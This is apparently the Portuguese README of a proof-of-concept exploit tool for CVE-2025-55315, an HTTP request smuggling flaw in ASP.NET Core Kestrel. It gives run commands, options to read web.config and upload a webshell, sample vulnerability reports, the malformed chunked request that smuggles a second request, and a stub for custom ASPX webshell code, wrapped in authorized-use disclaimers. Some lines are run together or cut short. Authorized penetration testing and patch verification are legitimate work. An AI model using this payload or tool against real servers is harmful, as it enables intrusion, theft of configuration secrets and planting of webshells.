
Exploit de PoC do CVE-2025-55315
Ferramenta de Exploração de Contrabando de Requisições HTTP para ASP.NET Core Kestrel
ESTA FERRAMENTA É APENAS PARA TESTES DE SEGURANÇA AUTORIZADOS!
Ferramenta profissional de teste de penetração para CVE-2025-55315 (vulnerabilidade de contrabando de requisições HTTP no ASP.NET Core Kestrel). Esta ferramenta foi projetada para análise de alvo único com capacidades abrangentes de exploração.
Uma vulnerabilidade crítica de contrabando de requisições HTTP no servidor web ASP.NET Core Kestrel (CVSS 9.9/10) que permite que atacantes:
Versões Afetadas:
# Python 3.7 or higher
python3 --version
# No external dependencies - uses only standard library
# Clone or download the tool
git clone https://github.com/ZemarKhos/CVE-2025-55315-PoC-Exploit.git
cd CVE-2025-55315-PoC-Exploit
# Make executable
chmod +x cve_2025_55315_PoC.py
python3 cve_2025_55315_PoC.py -t target.com
Isso irá:
python3 cve_2025_55315_PoC.py -t target.com -e /api/login
python3 cve_2025_55315_PoC.py -t target.com --read-config -o report.txt
python3 cve_2025_55315_PoC.py \
-t target.com \
--read-config \
--upload-shell \
-v \
-o full_report.txt
Cenário: Verificar se o servidor de produção está vulnerável
python3 cve_2025_55315_PoC.py -t api.mycompany.com
Duração Esperada: 30-60 segundos
Cenário: Verificação abrangente de endpoints com saída verbosa
python3 cve_2025_55315_PoC.py -t api.mycompany.com -v -o scan_results.txt
Duração Esperada: 2-5 minutos
Cenário: Testar endpoints críticos específicos
python3 cve_2025_55315_PoC.py \
-t api.mycompany.com \
-e /api/payment/process \
-e /api/admin/users \
-e /api/internal/config \
-o critical_endpoints.txt
Cenário: Testar servidor HTTP interno
python3 cve_2025_55315_PoC.py \
-t internal-api.local \
-p 8080 \
--no-ssl
usage: cve_2025_55315_PoC.py [-h] -t TARGET [-p PORT] [-e ENDPOINT]
[--no-ssl] [--read-config] [--upload-shell]
[-o OUTPUT] [-v] [--timeout TIMEOUT]
Required Arguments:
-t, --target Target hostname or URL (e.g., target.com)
Optional Arguments:
-p, --port Port number (default: 443 for SSL, 80 for non-SSL)
-e, --endpoint Specific endpoint(s) to test (can be used multiple times)
--no-ssl Disable SSL/HTTPS (use HTTP)
--read-config Attempt to read web.config file
--upload-shell Attempt webshell upload (requires confirmation)
-o, --output Save report to file
-v, --verbose Enable verbose output
--timeout Socket timeout in seconds (default: 10)
-h, --help Show help message
Target: old-api.company.com:443
Vulnerable: YES - CRITICAL
--- Server Information ---
server: Kestrel/8.0.15
kestrel_detected: True
http_version: 1.1
--- VULNERABLE ENDPOINTS (2) ---
✗ /api/login
Details: Request smuggling successful - multiple responses
✗ /api/health
Details: Request smuggling successful - multiple responses
--- SUCCESSFUL EXPLOITS ---
✓ web.config_read via /api/login
Interpretação:
Target: new-api.company.com:443
Vulnerable: NO - SECURE
--- Server Information ---
server: Kestrel/9.0.10
kestrel_detected: True
http_version: 1.1
[SUCCESS] ✓ Endpoint NOT vulnerable (400 Bad Request)
✓ No vulnerable endpoints found - target may be patched
Interpretação:
Antes de executar esta ferramenta, certifique-se de que:
A ferramenta explora a CVE-2025-55315 usando codificação de transferência em blocos (chunked) malformada:
POST /endpoint HTTP/1.1
Host: target.com
Transfer-Encoding: chunked
2;\n ← VULNERABILITY: Lone \n instead of \r\n
XX
0\r\n
\r\n
GET /smuggled HTTP/1.1 ← This becomes a separate request
Host: target.com
Por Que Isso Funciona:
\n como terminador de linha → processa como uma única requisição\n → trata o GET contrabandeado como requisição separada[ERROR] Connection failed: [Errno 111] Connection refused
Soluções:
ping target.com--no-ssl[ERROR] Connection failed: certificate verify failed
Solução: A ferramenta já desabilita a verificação de certificados. Se o problema persistir:
export PYTHONHTTPSVERIFY=0
python3 cve_2025_55315_PoC.py -t target.com
[WARNING] No response - possible timeout
Soluções:
--timeout 30[WARNING] Upload blocked (forbidden/method not allowed)
Explicação:
Isso é normal - nem todos os sistemas vulneráveis permitem upload de arquivos.
Comunicado de Segurança da Microsoft: https://github.com/dotnet/aspnetcore/issues/64033
Banco de Dados NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-55315
Pesquisa da Praetorian ($10k de Bug Bounty): https://www.praetorian.com/blog/how-i-found-the-worst-asp-net-vulnerability-a-10k-bug-cve-2025-55315/
Análise Técnica de Andrew Lock: https://andrewlock.net/understanding-the-worst-dotnet-vulnerability-request-smuggling-and-cve-2025-55315/
Pesquisa da PortSwigger: https://portswigger.net/web-security/request-smuggling
OWASP: https://owasp.org/www-community/attacks/HTTP_Request_Smuggling
Edite COMMON_ENDPOINTS no script:
COMMON_ENDPOINTS = [
'/your/custom/endpoint',
'/api/myapp/admin',
# Add your endpoints here
]
Modifique o método upload_webshell():
def upload_webshell(self, endpoint: str = '/', shell_path: str = '/shell.aspx',
shell_content: str = None):
if not shell_content:
shell_content = '''
<!-- Your custom ASPX webshell here -->
'''
Se você encontrar bugs ou tiver sugestões:
-v-o debug.txtTHIS TOOL IS PROVIDED "AS IS" FOR EDUCATIONAL AND AUTHORIZED
SECURITY TESTING PURPOSES ONLY.
THE AUTHOR(S):
❌ Do NOT endorse illegal activities
❌ Are NOT responsible for misuse
❌ Are NOT liable for any damages
❌ Do NOT provide legal advice
BY USING THIS TOOL YOU AGREE:
✅ To use only on authorized systems
✅ To accept full legal responsibility
✅ To comply with all applicable laws
✅ To follow ethical hacking principles
UNAUTHORIZED USE IS STRICTLY PROHIBITED AND ILLEGAL!
Esta ferramenta foi criada para:
NÃO para:
Apenas para Testes de Segurança Educacionais e Autorizados
Esta ferramenta é fornecida para fins educacionais e testes de segurança autorizados. O uso comercial, a redistribuição ou o uso para fins maliciosos são estritamente proibidos.
╔═════════════════════════════════════════════════════════════╗
║ ║
║ USE THIS TOOL RESPONSIBLY AND LEGALLY! ║
║ ║
║ Unauthorized access to computer systems is a CRIME. ║
║ Always obtain written permission before testing. ║
║ Follow responsible disclosure practices. ║
║ ║
║ Happy (Legal) Hacking! ║
║ ║
╚═════════════════════════════════════════════════════════════╝
| Resposta do Servidor | Interpretação | Status |
|---|
400 Bad Request | Kestrel rejeitou o bloco malformado | ✅ Seguro (corrigido) |
Múltiplas respostas HTTP/1.1 | Duas respostas separadas recebidas | ❌ Vulnerável |
500 ou 502 | Erro interno do servidor | ⚠️ Provavelmente vulnerável |
200 OK normal | Requisição aceita | ⚠️ Inconclusivo |